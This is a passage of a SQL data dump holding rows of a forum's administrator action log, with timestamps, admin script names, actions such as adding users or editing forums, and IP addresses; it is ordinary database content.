'user.php', 'update', '', '141.101.105.136'), (1067, 40, 1435587615, 'user.php', 'edit', 'user id = 100', '141.101.105.136'), (1068, 40, 1435587657, 'user.php', 'update', 'user id = 100', '141.101.105.136'), (1069, 40, 1435587659, 'user.php', 'modify', 'user id = 100', '141.101.105.136'), (1070, 40, 1435594119, 'user.php', 'add', '', '108.162.229.5'), (1071, 40, 1435594167, 'user.php', 'update', '', '108.162.229.5'), (1072, 40, 1435594169, 'user.php', 'modify', 'user id = 164', '108.162.229.5'), (1073, 100, 1435677880, 'moderate.php', 'posts', '', '108.162.254.105'), (1074, 100, 1435677880, 'moderate.php', 'posts', '', '108.162.254.105'), (1075, 40, 1435679004, 'user.php', 'add', '', '108.162.229.5'), (1076, 40, 1435679640, 'user.php', 'update', '', '108.162.229.5'), (1077, 40, 1435679641, 'user.php', 'modify', 'user id = 165', '108.162.229.5'), (1078, 40, 1435681672, 'banning.php', 'banuser', '', '108.162.229.5'), (1079, 40, 1435681679, 'banning.php', 'modify', '', '108.162.229.5'), (1080, 40, 1435681718, 'usergroup.php', 'modify', '', '108.162.229.5'), (1081, 40, 1435681736, 'user.php', 'modify', '', '108.162.229.5'), (1082, 40, 1435681740, 'user.php', 'find', '', '108.162.229.5'), (1083, 40, 1435681744, 'user.php', 'find', '', '108.162.229.5'), (1084, 40, 1435681745, 'user.php', 'find', '', '108.162.229.5'), (1085, 40, 1435681747, 'user.php', 'find', '', '108.162.229.5'), (1086, 40, 1435681749, 'user.php', 'edit', 'user id = 165', '108.162.229.5'), (1087, 40, 1435748324, 'user.php', 'add', '', '141.101.105.136'), (1088, 40, 1435748359, 'user.php', 'update', '', '141.101.105.136'), (1089, 40, 1435748360, 'user.php', 'modify', 'user id = 166', '141.101.105.136'), (1090, 13, 1436623214, 'banning.php', 'modify', '', '108.162.254.252'), (1091, 13, 1436623223, 'user.php', 'doips', '', '108.162.254.252'), (1092, 13, 1436623238, 'forum.php', 'modify', '', '108.162.254.252'), (1093, 13, 1436623267, 'user.php', 'find', '', '108.162.254.252'), (1094, 13, 1436623275, 'user.php', 'findnames', '', '108.162.254.252'), (1095, 13, 1436623282, 'user.php', 'viewuser', 'user id = 13', '108.162.254.252'), (1096, 13, 1436623348, 'forum.php', 'modify', '', '108.162.254.252'), (1097, 29, 1437424137, 'plugin.php', 'product', '', '198.41.242.184'), (1098, 29, 1437424138, 'plugin.php', 'product', '', '198.41.242.184'), (1099, 29, 1437424149, 'user.php', 'add', '', '198.41.242.184'), (1100, 29, 1437424161, 'user.php', 'update', '', '198.41.242.184'), (1101, 29, 1437424163, 'user.php', 'modify', 'user id = 167', '198.41.242.184'), (1102, 29, 1437424401, 'user.php', 'find', '', '198.41.242.184'), (1103, 29, 1437424401, 'user.php', 'edit', 'user id = 167', '198.41.242.184'), (1104, 29, 1437424408, 'user.php', 'remove', 'user id = 167', '198.41.242.184'), (1105, 29, 1437424411, 'user.php', 'kill', 'user id = 167', '198.41.242.184'), (1106, 29, 1437424413, 'user.php', 'modify', '', '198.41.242.184'), (1107, 29, 1437424781, 'user.php', 'modify', '', '198.41.242.184'), (1108, 40, 1438170746, 'user.php', 'modify', '', '141.101.105.86'), (1109, 40, 1438170751, 'user.php', 'find', '', '141.101.105.86'), (1110, 40, 1438170751, 'user.php', 'edit', '', '141.101.105.86'), (1111, 40, 1438170754, 'user.php', 'modify', '', '141.101.105.86'), (1112, 40, 1438170756, 'usertools.php', 'merge', '', '141.101.105.86'), (1113, 40, 1438170757, 'user.php', 'modify', '', '141.101.105.86'), (1114, 40, 1438170759, 'user.php', 'find', '', '141.101.105.86'), (1115, 40, 1438170761, 'user.php', 'find', '', '141.101.105.86'), (1116, 40, 1438170762, 'user.php', 'find', '', '141.101.105.86'), (1117, 40, 1438170766, 'user.php', 'find', '', '141.101.105.86'), (1118, 40, 1438170770, 'user.php', 'edit', '', '141.101.105.86'), (1119, 40, 1438170813, 'user.php', 'update', '', '141.101.105.86'), (1120, 40, 1438170815, 'user.php', 'edit', 'user id = 100', '141.101.105.86'), (1121, 40, 1438170820, 'user.php', 'update', 'user id = 100', '141.101.105.86'), (1122, 40, 1438170821, 'user.php', 'modify', 'user id = 100', '141.101.105.86'), (1123, 40, 1438247804, 'user.php', 'modify', '', '141.101.105.86'), (1124, 40, 1438247805, 'user.php', 'find', '', '141.101.105.86'), (1125, 40, 1438247807, 'user.php', 'find', '', '141.101.105.86'), (1126, 40, 1438247809, 'user.php', 'find', '', '141.101.105.86'), (1127, 40, 1438248281, 'user.php', 'find', '', '141.101.105.86'), (1128, 40, 1438252745, 'user.php', 'add', '', '141.101.105.86'), (1129, 40, 1438252786, 'user.php', 'update', '', '141.101.105.86'), (1130, 40, 1438252787, 'user.php', 'modify', 'user id = 168', '141.101.105.86'), (1131, 40, 1438253727, 'user.php', 'modify', 'user id = 168', '141.101.105.86'), (1132, 40, 1438255106, 'user.php', 'modify', 'user id = 168', '141.101.105.86'), (1133, 29, 1438795810, 'plugin.php', 'product', '', '162.158.91.136'), (1134, 29, 1438795812, 'plugin.php', 'modify', '', '162.158.91.136'), (1135, 29, 1438795819, 'plugin.php', 'add', '', '162.158.91.136'), (1136, 29, 1438795820, 'plugin.php', 'files', '', '162.158.91.136'), (1137, 29, 1438795825, 'options.php', '', '', '162.158.91.136'), (1138, 29, 1438795829, 'options.php', 'options', '', '162.158.91.136'), (1139, 29, 1438796480, 'options.php', 'options', '', '162.158.91.136'), (1140, 29, 1438796485, 'options.php', '', '', '162.158.91.136'), (1141, 29, 1438796491, 'options.php', 'options', '', '162.158.91.136'), (1142, 1, 1439047112, 'user.php', 'add', '', '141.101.98.112'), (1143, 1, 1439047138, 'user.php', 'update', '', '141.101.98.112'), (1144, 1, 1439047140, 'user.php', 'modify', 'user id = 169', '141.101.98.112'), (1145, 1, 1439057868, 'user.php', 'add', '', '141.101.105.220'), (1146, 1, 1439057926, 'user.php', 'update', '', '141.101.105.220'), (1147, 1, 1439057927, 'user.php', 'modify', 'user id = 170', '141.101.105.220'), (1148, 1, 1439059004, 'user.php', 'edit', 'user id = 170', '141.101.105.220'), (1149, 1, 1439059017, 'user.php', 'update', 'user id = 170', '141.101.105.220'), (1150, 1, 1439059019, 'user.php', 'modify', 'user id = 170', '141.101.105.220'), (1151, 1, 1439206369, 'forum.php', 'modify', '', '108.162.216.63'), (1152, 1, 1439206379, 'forum.php', 'add', '', '108.162.216.63'), (1153, 1, 1439206403, 'forum.php', 'update', '', '108.162.216.63'), (1154, 1, 1439206410, 'forum.php', 'modify', 'forum id = 24', '108.162.216.63'), (1155, 1, 1439210232, 'thread.php', 'move', '', '108.162.216.63'), (1156, 1, 1439210304, 'thread.php', 'prune', '', '108.162.216.63'), (1157, 1, 1439215413, 'user.php', 'add', '', '108.162.216.63'), (1158, 1, 1439215463, 'user.php', 'update', '', '108.162.216.63'), (1159, 1, 1439215465, 'user.php', 'modify', 'user id = 171', '108.162.216.63'), (1160, 1, 1439215579, 'user.php', 'add', '', '108.162.216.63'), (1161, 1, 1439215596, 'user.php', 'update', '', '108.162.216.63'), (1162, 1, 1439215598, 'user.php', 'modify', 'user id = 172', '108.162.216.63'), (1163, 1, 1439818474, 'user.php', 'modify', '', '141.101.105.136'), (1164, 1, 1439818476, 'user.php', 'find', '', '141.101.105.136'), (1165, 1, 1439818478, 'user.php', 'find', '', '141.101.105.136'), (1166, 1, 1439818479, 'user.php', 'find', '', '141.101.105.136'), (1167, 1, 1439818481, 'user.php', 'find', '', '141.101.105.136'), (1168, 1, 1439818760, 'user.php', 'add', '', '141.101.105.136'), (1169, 1, 1439818801, 'user.php', 'update', '', '141.101.105.136'), (1170, 1, 1439818802, 'user.php', 'modify', 'user id = 173', '141.101.105.136'), (1171, 1, 1439912523, 'user.php', 'modify', '', '141.101.105.136'), (1172, 1, 1439912524, 'user.php', 'find', '', '141.101.105.136'), (1173, 1, 1439912526, 'user.php', 'find', '', '141.101.105.136'), (1174, 1, 1439912526, 'user.php', 'find', '', '141.101.105.136'), (1175, 1, 1439912527, 'user.php', 'find', '', '141.101.105.136'), (1176, 1, 1439912528, 'user.php', 'find', '', '141.101.105.136'), (1177, 1, 1439912554, 'user.php', 'find', '', '141.101.105.136'), (1178, 1, 1439912556, 'user.php', 'add', '', '141.101.105.136'), (1179, 1, 1439992932, 'user.php', 'add', '', '141.101.105.136'), (1180, 1, 1439992933, 'user.php', 'modify', '', '141.101.105.136'), (1181, 1, 1439992934, 'user.php', 'find', '', '141.101.105.136'), (1182, 1, 1439992941, 'user.php', 'add', '', '141.101.105.136'), (1183, 1, 1439992971, 'user.php', 'update', '', '141.101.105.136'), (1184, 1, 1439992972, 'user.php', 'modify', 'user id = 174', '141.101.105.136'), (1185, 1, 1440412554, 'user.php', 'modify', '', '141.101.105.136'), (1186, 1, 1440412555, 'user.php', 'find', '', '141.101.105.136'), (1187, 1, 1440412557, 'user.php', 'find', '', '141.101.105.136'), (1188, 1, 1440412558, 'user.php', 'find', '', '141.101.105.136'), (1189, 1, 1440412560, 'user.php', 'find', '', '141.101.105.136'), (1190, 1, 1440412561, 'user.php', 'find', '', '141.101.105.136'), (1191, 1, 1440412563, 'user.php', 'edit', '', '141.101.105.136'), (1192, 1, 1440412570, 'user.php', 'update', '', '141.101.105.136'), (1193, 1, 1440412572, 'user.php', 'edit', 'user id = 100', '141.101.105.136'), (1194, 1, 1440412594, 'user.php', 'update', 'user id = 100', '141.101.105.136'), (1195, 1, 1440412596, 'user.php', 'modify', 'user id = 100', '141.101.105.136'), (1196, 1, 1440496644, 'thread.php', 'prune', '', '173.245.53.83'), (1197, 1, 1440496660, 'thread.php', 'move', '', '173.245.53.83'), (1198, 1, 1440496666, 'thread.php', 'prune', '', '173.245.53.83'), (1199, 1, 1440496801, 'thread.php', 'prune', '', '173.245.53.83'), (1200, 1, 1440496805, 'thread.php', 'move', '', '173.245.53.83'), (1201, 1, 1440496822, 'moderate.php', 'messages', '', '173.245.53.83'), (1202, 1, 1440496822, 'user.php', 'moderate', '', '173.245.53.83'), (1203, 1, 1440496827, 'forum.php', 'modify', '', '173.245.53.83'), (1204, 1, 1440496831, 'moderator.php', 'showlist', '', '173.245.53.83'), (1205, 1, 1440496837, 'user.php', 'edit', 'user id = 1', '173.245.53.83'), (1206, 1, 1440498166, 'user.php', 'modify', '', '173.245.53.83'), (1207, 1, 1440498168, 'user.php', 'find', '', '173.245.53.83'), (1208, 1, 1440498174, 'user.php', 'find', '', '173.245.53.83'), (1209, 1, 1440498178, 'user.php', 'edit', '', '173.245.53.83'), (1210, 1, 1440498196, 'user.php', 'edit', '', '173.245.53.83'), (1211, 1, 1440498201, 'user.php', 'update', '', '173.245.53.83'), (1212, 1, 1440498203, 'user.php', 'edit', 'user id = 2', '173.245.53.83'), (1213, 1, 1440498216, 'banning.php', 'banuser', '', '173.245.53.83'), (1214, 1, 1440498248, 'user.php', 'editaccess', 'user id = 2', '173.245.53.83'), (1215, 1, 1440498261, 'user.php', 'updateaccess', 'user id = 2', '173.245.53.83'), (1216, 1, 1440498262, 'user.php', 'edit', 'user id = 2', '173.245.53.83'), (1217, 29, 1440530471, 'moderate.php', 'posts', '', '162.158.90.126'), (1218, 29, 1440530845, 'options.php', '', '', '162.158.90.126'), (1219, 29, 1440530848, 'options.php', 'options', '', '162.158.90.126'), (1220, 1, 1440595451, 'forum.php', 'modify', '', '198.41.242.214'), (1221, 1, 1440595471, 'forum.php', 'add', '', '198.41.242.214'), (1222, 1, 1440595507, 'forum.php', 'update', '', '198.41.242.214'), (1223, 1, 1440595513, 'forum.php', 'modify', 'forum id = 25', '198.41.242.214'), (1224, 1, 1440595549, 'forum.php', 'edit', 'forum id = 25', '198.41.242.214'), (1225, 1, 1440595643, 'forum.php', 'modify', '', '198.41.243.188'), (1226, 1, 1440595678, 'forum.php', 'doorder', '', '198.41.243.188'), (1227, 1, 1440595679, 'forum.php', 'modify', '', '198.41.243.188'), (1228, 1, 1440595686, 'forum.php', 'add', '', '198.41.243.188'), (1229, 1, 1440595707, 'forum.php', 'update', '', '198.41.243.188'), (1230, 1, 1440595708, 'forum.php', 'modify', 'forum id = 26', '198.41.243.188'), (1231, 1, 1440595713, 'forum.php', 'add', '', '198.41.243.188'), (1232, 1, 1440595718, 'forum.php', 'update', '', '198.41.243.188'), (1233, 1, 1440595720, 'forum.php', 'modify', 'forum id = 27', '198.41.243.188'), (1234, 1, 1440595725, 'forum.php', 'add', '', '198.41.243.188'), (1235, 1, 1440595732, 'forum.php', 'update', '', '198.41.243.188'), (1236, 1, 1440595733, 'forum.php', 'modify', 'forum id = 28', '198.41.243.188'), (1237, 1, 1440595760, 'moderator.php', 'add', 'forum id = 25', '198.41.243.188'), (1238, 1, 1440595765, 'forum.php', 'add', '', '198.41.243.188'), (1239, 1, 1440595778, 'forum.php', 'update', '', '198.41.243.188'), (1240, 1, 1440595780, 'forum.php', 'modify', 'forum id = 29', '198.41.243.188'), (1241, 1, 1440595833, 'forum.php', 'add', '', '198.41.243.188'), (1242, 1, 1440595843, 'forum.php', 'update', '', '198.41.243.188'), (1243, 1, 1440595844, 'forum.php', 'modify', 'forum id = 30', '198.41.243.188'), (1244, 1, 1440595903, 'forum.php', 'edit', 'forum id = 14', '198.41.243.188'), (1245, 1, 1440595904, 'forum.php', 'edit', 'forum id = 25', '198.41.243.188'), (1246, 1, 1440595948, 'forum.php', 'edit', 'forum id = 14', '198.41.243.188'), (1247, 1, 1440595949, 'forum.php', 'edit', 'forum id = 25', '198.41.243.188'), (1248, 1, 1440595975, 'forum.php', 'update', 'forum id = 25', '198.41.243.188'), (1249, 1, 1440595976, 'forum.php', 'modify', 'forum id = 25', '198.41.243.188'), (1250, 1, 1440677255, 'forum.php', 'modify', '', '198.41.243.188'), (1251, 1, 1440677259, 'forum.php', 'edit', 'forum id = 25', '198.41.243.188'), (1252, 1, 1440677296, 'forum.php', 'update', 'forum id = 25', '198.41.243.188'), (1253, 1, 1440677311, 'forum.php', 'modify', 'forum id = 25', '198.41.243.188'), (1254, 1, 1440677314, 'forum.php', 'edit', 'forum id = 14', '198.41.243.188'), (1255, 1, 1440677315, 'forum.php', 'edit', 'forum id = 25', '198.41.243.188'), (1256, 1, 1441029940, 'forum.php', 'modify', '', '141.101.104.186'), (1257, 1, 1441029941, 'forumpermission.php', 'modify', '', '141.101.104.186'), (1258, 1, 1441029956, 'resources.php', '', '', '141.101.104.186'), (1259, 1, 1441029966, 'resources.php', 'view', 'usergroup id = -1', '141.101.104.186'), (1260, 1, 1441029969, 'forum.php', 'modify', '', '141.101.104.186'), (1261, 1, 1441029978, 'forum.php', 'edit', 'forum id = 1', '141.101.104.186'), (1262, 1, 1441029980, 'forum.php', 'edit', 'forum id = 25', '141.101.104.186'), (1263, 1, 1441030016, 'forum.php', 'edit', 'forum id = 30', '141.101.104.186'), (1264, 1, 1441030017, 'forum.php', 'edit', 'forum id = 16', '141.101.104.186'), (1265, 1, 1441030071, 'forum.php', 'edit', 'forum id = 25', '141.101.104.186'), (1266, 1, 1441030080, 'forum.php', 'update', 'forum id = 25', '141.101.104.186'), (1267, 1, 1441030086, 'forum.php', 'modify', 'forum id = 25', '141.101.104.186'), (1268, 1, 1441188525, 'user.php', 'add', '', '141.101.104.186'), (1269, 1, 1441188579, 'user.php', 'update', '', '141.101.104.186'), (1270, 1, 1441188580, 'user.php', 'modify', 'user id = 175', '141.101.104.186'), (1271, 1, 1441204087, 'user.php', 'modify', '', '141.101.104.186'), (1272, 1, 1441204088, 'user.php', 'find', '', '141.101.104.186'), (1273, 1, 1441204095, 'user.php', 'find', '', '141.101.104.186'), (1274, 1, 1441204121, 'user.php', 'find', '', '141.101.104.186'), (1275, 1, 1441204131, 'user.php', 'add', '', '141.101.104.186'), (1276, 1, 1441204142, 'user.php', 'update', '', '141.101.104.186'), (1277, 1, 1441204143, 'user.php', 'modify', 'user id = 176', '141.101.104.186'), (1278, 1, 1441209436, 'user.php', 'add', '', '141.101.104.186'), (1279, 1, 1441209439, 'user.php', 'modify', '', '141.101.104.186'), (1280, 1, 1441209440, 'user.php', 'find', '', '141.101.104.186'), (1281, 1, 1441209442, 'user.php', 'find', '', '141.101.104.186'), (1282, 1, 1441209443, 'user.php', 'find', '', '141.101.104.186'), (1283, 1, 1441209444, 'user.php', 'find', '', '141.101.104.186'), (1284, 1, 1441209445, 'user.php', 'find', '', '141.101.104.186'), (1285, 1, 1441209450, 'user.php', 'edit', '', '141.101.104.186'), (1286, 1, 1441209455, 'user.php', 'update', '', '141.101.104.186'), (1287, 1, 1441209456, 'user.php', 'edit', 'user id = 100', '141.101.104.186'), (1288, 1, 1441209461, 'user.php', 'update', 'user id = 100', '141.101.104.186'), (1289, 1, 1441209463, 'user.php', 'modify', 'user id = 100', '141.101.104.186'), (1290, 1, 1442226424, 'user.php', 'modify', '', '173.245.53.64'), (1291, 1, 1442226426, 'user.php', 'find', '', '173.245.53.64'), (1292, 1, 1442226428, 'user.php', 'find', '', '173.245.53.64'), (1293, 1, 1442226428, 'user.php', 'find', '', '173.245.53.64'), (1294, 1, 1442226429, 'user.php', 'find', '', '173.245.53.64'), (1295, 1, 1442226430, 'user.php', 'find', '', '173.245.53.64'), (1296, 1, 1442226431, 'user.php', 'find', '', '173.245.53.64'), (1297, 1, 1442226431, 'user.php', 'find', '', '173.245.53.64'), (1298, 1, 1442226431, 'user.php', 'find', '', '173.245.53.64'), (1299, 1, 1442226432, 'user.php', 'find', '', '173.245.53.64'), (1300, 1, 1442226433, 'user.php', 'find', '', '173.245.53.64'), (1301, 1, 1442226435, 'user.php', 'edit', '', '173.245.53.64'), (1302, 1, 1442226439, 'user.php', 'update', '', '173.245.53.64'), (1303, 1, 1442226441, 'user.php', 'edit', 'user id = 100', '173.245.53.64'), (1304, 1, 1442226461, 'user.php', 'update', 'user id = 100', '173.245.53.64'), (1305, 1, 1442226462, 'user.php', 'modify', 'user id = 100', '173.245.53.64'), (1306, 100, 1442435384, 'user.php', 'add', '', '162.158.90.112'), (1307, 100, 1442435424, 'user.php', 'update', '', '162.158.90.112'), (1308, 100, 1442435426, 'user.php', 'modify', 'user id = 177', '162.158.90.112'), (1309, 100, 1442435504, 'user.php', 'add', '', '162.158.90.112'), (1310, 100, 1442435514, 'user.php', 'update', '', '162.158.90.112'), (1311, 100, 1442435517, 'user.php', 'modify', 'user id = 178', '162.158.90.112'), (1312, 1, 1442571876, 'options.php', '', '', '173.245.53.64'), (1313, 1, 1442571881, 'options.php', 'options', '', '173.245.53.64'), (1314, 1, 1442571912, 'language.php', 'modify', '', '173.245.53.64'), (1315, 1, 1442571996, 'options.php', 'options', '', '173.245.53.64'), (1316, 1, 1442575963, 'user.php', 'add', '', '173.245.53.64'), (1317, 1, 1442575973, 'user.php', 'update', '', '173.245.53.64'), (1318, 1, 1442575974, 'user.php', 'modify', 'user id = 179', '173.245.53.64'), (1319, 1, 1442580393, 'template.php', 'modify', '', '173.245.53.64'), (1320, 1, 1442580409, 'css.php', 'edit', 'style id = 2', '173.245.53.64'), (1321, 1, 1442586331, 'forum.php', 'modify', '', '141.101.104.54'), (1322, 1, 1442586355, 'forum.php', 'doorder', '', '141.101.104.54'), (1323, 1, 1442586356, 'forum.php', 'modify', '', '141.101.104.54'), (1324, 1, 1442586389, 'forum.php', 'doorder', '', '141.101.104.54'), (1325, 1, 1442586420, 'forum.php', 'modify', '', '141.101.104.54'), (1326, 1, 1442586431, 'forum.php', 'edit', 'forum id = 25', '141.101.104.54'), (1327, 1, 1442586446, 'forum.php', 'update', 'forum id = 25', '141.101.104.54'), (1328, 1, 1442586452, 'forum.php', 'modify', 'forum id = 25', '141.101.104.54'), (1329, 1, 1442586465, 'forum.php', 'edit', 'forum id = 1', '141.101.104.54'), (1330, 1, 1442586537, 'forum.php', 'edit', 'forum id = 25', '141.101.104.54'), (1331, 1, 1442586551, 'forum.php', 'update', 'forum id = 25', '141.101.104.54'), (1332, 1, 1442586552, 'forum.php', 'modify', 'forum id = 25', '141.101.104.54'), (1333, 1, 1442586583, 'forum.php', 'edit', 'forum id = 25', '141.101.104.54'), (1334, 1, 1442586608, 'forum.php', 'update', 'forum id = 25', '141.101.104.54'), (1335, 1, 1442586609, 'forum.php', 'modify', 'forum id = 25', '141.101.104.54'), (1336, 1, 1442586623, 'forumpermission.php', 'modify', '', '141.101.104.54'), (1337, 1, 1442586635, 'forumpermission.php', 'edit', 'forum id = 25 / usergroup id = 1', '141.101.104.54'), (1338, 1, 1442586648, 'forumpermission.php', 'edit', 'forumpermission id = 118', '141.101.104.54'), (1339, 1, 1442586650, 'forumpermission.php', 'edit', 'forum id = 25 / usergroup id = 1', '141.101.104.54'), (1340, 1, 1442586673, 'forumpermission.php', 'doupdate', '', '141.101.104.54'), (1341, 1, 1442586675, 'forumpermission.php', 'modify', 'forum id = 25', '141.101.104.54'), (1342, 1, 1442586715, 'forum.php', 'edit', 'forum id = 25', '141.101.104.54'), (1343, 1, 1442586720, 'forum.php', 'update', 'forum id = 25', '141.101.104.54'), (1344, 1, 1442586722, 'forum.php', 'modify', 'forum id = 25', '141.101.104.54'), (1345, 1, 1442587927, 'forumpermission.php', 'modify', '', '141.101.104.54'), (1346, 1, 1442587937, 'forumpermission.php', 'quickforum', '', '141.101.104.54'), (1347, 1, 1442587948, 'resources.php', '', '', '141.101.104.54'), (1348, 1, 1442587968, 'options.php', '', '', '141.101.104.54'), (1349, 1, 1442587972, 'options.php', 'options', '', '141.101.104.54'), (1350, 1, 1442588001, 'options.php', 'options', '', '141.101.104.54'), (1351, 1, 1442588010, 'options.php', 'options', '', '141.101.104.54'), (1352, 1, 1442588048, 'options.php', 'options', '', '141.101.104.54'), (1353, 1, 1442588067, 'options.php', 'options', '', '141.101.104.54'), (1354, 1, 1442588085, 'options.php', 'dooptions', '', '141.101.104.54'), (1355, 1, 1442588087, 'options.php', 'options', '', '141.101.104.54'), (1356, 1, 1442588104, 'options.php', 'options', '', '141.101.104.54'), (1357, 1, 1442588117, 'options.php', 'options', '', '141.101.104.54'), (1358, 1, 1442588183, 'options.php', 'options', '', '141.101.104.54'), (1359, 1, 1442588189, 'options.php', 'options', '', '141.101.104.54'), (1360, 1, 1442588205, 'options.php', 'options', '', '141.101.104.54'), (1361, 1, 1442588293, 'options.php', 'dooptions', '', '141.101.104.54'), (1362, 1, 1442588294, 'options.php', 'options', '', '141.101.104.54'), (1363, 100, 1442691757, 'user.php', 'add', '', '162.158.90.112'), (1364, 100, 1442691822, 'user.php', 'update', '', '162.158.90.112'), (1365, 100, 1442691823, 'user.php', 'modify', 'user id = 180', '162.158.90.112'), (1366, 100, 1442745608, 'user.php', 'add', '', '162.158.90.112'), (1367, 100, 1442745619, 'user.php', 'update', '', '162.158.90.112'), (1368, 100, 1442745621, 'user.php', 'modify', 'user id = 181', '162.158.90.112'), (1369, 100, 1442745627, 'user.php', 'modify', '', '162.158.90.112'), (1370, 100, 1442745631, 'user.php', 'find', '', '162.158.90.112'), (1371, 100, 1442745631, 'user.php', 'edit', 'user id = 181', '162.158.90.112'), (1372, 100, 1442745644, 'user.php', 'update', 'user id = 181', '162.158.90.112'), (1373, 100, 1442745645, 'user.php', 'modify', 'user id = 181', '162.158.90.112'), (1374, 100, 1442766856, 'user.php', 'add', '', '162.158.90.112'), (1375, 100, 1442766856, 'user.php', 'modify', '', '162.158.90.112'), (1376, 100, 1442766861, 'user.php', 'find', '', '162.158.90.112'), (1377, 100, 1442766861, 'user.php', 'edit', '', '162.158.90.112'), (1378, 100, 1442766875, 'user.php', 'update', '', '162.158.90.112'), (1379, 100, 1442766878, 'user.php', 'edit', 'user id = 41', '162.158.90.112'), (1380, 100, 1442766888, 'user.php', 'update', 'user id = 41', '162.158.90.112'), (1381, 100, 1442766889, 'user.php', 'modify', 'user id = 41', '162.158.90.112'), (1382, 100, 1442767136, 'forum.php', 'modify', '', '162.158.90.112'), (1383, 100, 1442767162, 'forumpermission.php', 'modify', '', '162.158.90.112'), (1384, 13, 1442777436, 'forum.php', 'modify', '', '162.158.91.200'), (1385, 13, 1442777465, 'user.php', 'find', '', '162.158.91.200'), (1386, 13, 1442777473, 'user.php', 'findnames', '', '162.158.91.200'), (1387, 13, 1442777482, 'user.php', 'reputation', 'user id = 13', '162.158.91.200'), (1388, 13, 1442777487, 'user.php', 'viewuser', 'user id = 13', '162.158.91.200'), (1389, 13, 1442777516, 'user.php', 'viewuser', 'user id = 13', '162.158.91.200'), (1390, 13, 1442777525, 'user.php', 'viewuser', 'user id = 13', '162.158.91.200'), (1391, 100, 1442783053, 'forum.php', 'modify', '', '162.158.90.112'), (1392, 100, 1442783075, 'forum.php', 'remove', 'forum id = 25', '162.158.90.112'), (1393, 100, 1442783077, 'forum.php', 'kill', 'forum id = 25', '162.158.90.112'), (1394, 100, 1442783079, 'forum.php', '', '', '162.158.90.112'), (1395, 100, 1442805463, 'user.php', 'add', '', '162.158.90.112'), (1396, 100, 1442805496, 'user.php', 'update', '', '162.158.90.112'), (1397, 100, 1442805498, 'user.php', 'modify', 'user id = 182', '162.158.90.112'), (1398, 100, 1442831239, 'user.php', 'add', '', '162.158.90.112'), (1399, 100, 1442831277, 'user.php', 'update', '', '162.158.90.112'), (1400, 100, 1442831279, 'user.php', 'modify', 'user id = 183', '162.158.90.112'), (1401, 100, 1442832733, 'user.php', 'modify', '', '162.158.90.112'), (1402, 100, 1442832736, 'user.php', 'find', '', '162.158.90.112'), (1403, 100, 1442832736, 'user.php', 'edit', 'user id = 182', '162.158.90.112'), (1404, 100, 1442832775, 'user.php', 'update', 'user id = 182', '162.158.90.112'), (1405, 100, 1442832776, 'user.php', 'modify', 'user id = 182', '162.158.90.112'), (1406, 100, 1442832848, 'forum.php', 'modify', '', '162.158.90.112'), (1407, 100, 1442832853, 'forum.php', 'edit', 'forum id = 19', '162.158.90.112'), (1408, 100, 1442832858, 'forumpermission.php', 'modify', '', '162.158.90.112'), (1409, 100, 1442832872, 'forumpermission.php', 'edit', 'forum id = 1 / usergroup id = 2', '162.158.90.112'), (1410, 100, 1442832880, 'forumpermission.php', 'doupdate', '', '162.158.90.112'), (1411, 100, 1442832882, 'forumpermission.php', 'modify', 'forum id = 1', '162.158.90.112'), (1412, 100, 1442832899, 'forumpermission.php', 'edit', 'forum id = 4 / usergroup id = 8', '162.158.90.112'), (1413, 100, 1442832906, 'forumpermission.php', 'edit', 'forum id = 2 / usergroup id = 8', '162.158.90.112'), (1414, 1, 1442834601, 'forum.php', 'modify', '', '173.245.53.64'), (1415, 100, 1442847907, 'user.php', 'add', '', '162.158.90.112'), (1416, 100, 1442848090, 'user.php', 'update', '', '162.158.90.112'), (1417, 100, 1442848135, 'user.php', 'add', '', '162.158.90.112'), (1418, 100, 1442848176, 'user.php', 'update', '', '162.158.90.112'), (1419, 100, 1442848180, 'user.php', 'modify', 'user id = 184', '162.158.90.112'), (1420, 100, 1442915515, 'forum.php', 'modify', '', '141.101.80.172'), (1421, 100, 1442915527, 'forum.php', 'add', '', '141.101.80.172'), (1422, 100, 1442915572, 'forum.php', 'update', '', '141.101.80.172'), (1423, 100, 1442915574, 'forum.php', 'modify', 'forum id = 31', '141.101.80.172'), (1424, 100, 1442915579, 'forum.php', 'add', '', '141.101.80.172'), (1425, 100, 1442915787, 'forum.php', 'update', '', '141.101.80.172'), (1426, 100, 1442915789, 'forum.php', 'modify', 'forum id = 32', '141.101.80.172'), (1427, 100, 1442915804, 'forum.php', 'add', '', '141.101.80.172'), (1428, 100, 1442915818, 'forum.php', 'update', '', '141.101.80.172'), (1429, 100, 1442915820, 'forum.php', 'modify', 'forum id = 33', '141.101.80.172'), (1430, 100, 1442915824, 'forum.php', 'add', '', '141.101.80.172'), (1431, 100, 1442915832, 'forum.php', 'update', '', '141.101.80.172'), (1432, 100, 1442915833, 'forum.php', 'modify', 'forum id = 34', '141.101.80.172'), (1433, 100, 1442915847, 'forum.php', 'remove', 'forum id = 33', '141.101.80.172'), (1434, 100, 1442915849, 'forum.php', 'kill', 'forum id = 33', '141.101.80.172'), (1435, 100, 1442915850, 'forum.php', '', '', '141.101.80.172'), (1436, 100, 1442915859, 'forum.php', 'add', '', '141.101.80.172'), (1437, 100, 1442915867, 'forum.php', 'update', '', '141.101.80.172'), (1438, 100, 1442915868, 'forum.php', 'modify', 'forum id = 35', '141.101.80.172'), (1439, 100, 1442915874, 'forum.php', 'add', '', '141.101.80.172'), (1440, 100, 1442915881, 'forum.php', 'update', '', '141.101.80.172'), (1441, 100, 1442915883, 'forum.php', 'modify', 'forum id = 36', '141.101.80.172'), (1442, 100, 1442915888, 'forum.php', 'add', '', '141.101.80.172'), (1443, 100, 1442915978, 'forum.php', 'update', '', '141.101.80.172'), (1444, 100, 1442915980, 'forum.php', 'modify', 'forum id = 37', '141.101.80.172'), (1445, 100, 1442915989, 'forum.php', 'edit', 'forum id = 31', '141.101.80.172'), (1446, 100, 1442916011, 'forum.php', 'update', 'forum id = 31', '141.101.80.172'), (1447, 100, 1442916012, 'forum.php', 'modify', 'forum id = 31', '141.101.80.172'), (1448, 100, 1442916059, 'forum.php', 'add', '', '141.101.80.172'), (1449, 100, 1442916066, 'forum.php', 'update', '', '141.101.80.172'), (1450, 100, 1442916068, 'forum.php', 'modify', 'forum id = 38', '141.101.80.172'), (1451, 100, 1442916073, 'forumpermission.php', 'modify', '', '141.101.80.172'), (1452, 100, 1442916110, 'forum.php', 'modify', '', '141.101.80.172'), (1453, 100, 1442916131, 'forum.php', 'add', '', '141.101.80.172'), (1454, 100, 1442916140, 'forum.php', 'update', '', '141.101.80.172'), (1455, 100, 1442916142, 'forum.php', 'modify', 'forum id = 39', '141.101.80.172'), (1456, 100, 1442916166, 'forum.php', 